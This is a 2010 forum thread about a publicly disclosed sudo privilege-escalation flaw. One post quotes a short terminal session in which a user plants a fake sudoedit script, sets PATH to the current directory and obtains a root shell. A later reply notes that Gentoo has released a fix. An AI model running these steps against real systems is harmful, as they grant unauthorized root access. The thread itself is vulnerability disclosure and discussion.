/http://www.securityfocus.com/archive/1/511602
Sponsored by: █ Sparkhost - Hosting Without Compromises! █ Hybrid Performance Web Hosting █ Spark Host Stream Hosting █ Hybrid IRC & IRCd Server Shell Accounts
Privilege Escalation In Sudo
Started by
bonarez
, Jun 02 2010 01:06 AM
2 replies to this topic
#1
bonarez
-
- Sergeant Major
-
- 1,252 posts
Retired GSO Second Lieutenant
Posted 02 June 2010 - 01:06 AM
Privilege Escalation in sudo > pretty ironic
/http://www.securityfocus.com/archive/1/511602
/http://www.securityfocus.com/archive/1/511602
"Ask the right question and you will receive the right answer. I'm just very sensitive about the right syntax"
Read the rules before you post
Read the rules before you post
#2
webdevil
-
- Sergeant Major
-
- 1,195 posts
Retired GSO General
Posted 02 June 2010 - 08:33 AM
Some insight
> inode@pandora:~$ echo "/bin/sh" > sudoedit
> inode@pandora:~$ /usr/bin/chmod +x sudoedit
> inode@pandora:~$ id
> uid=1000(inode) gid=100(users) groups=100(users)
> inode@pandora:~$ export PATH=.
> inode@pandora:~$ /usr/bin/sudo sudoedit /etc/hosts
> Password:
> sh-3.1# /usr/bin/id
> uid=0(root) gid=0(root)
> groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),
> 11(floppy),17(audio),18(video),19(cdrom),26(tape),83(plugdev),
> 84(power),86(netdev),93(scanner)
> sh-3.1#
#3
drygol
-
- Members
-
- 153 posts
Corporal
Posted 02 June 2010 - 09:19 AM
I think they corrected it in Gentoo just yesterday releasing GLSA on it 
So , knowing how big pain in the ass is to upgrade gentoo ..... just
So , knowing how big pain in the ass is to upgrade gentoo ..... just
0 user(s) are reading this topic
0 members, 0 guests, 0 anonymous users
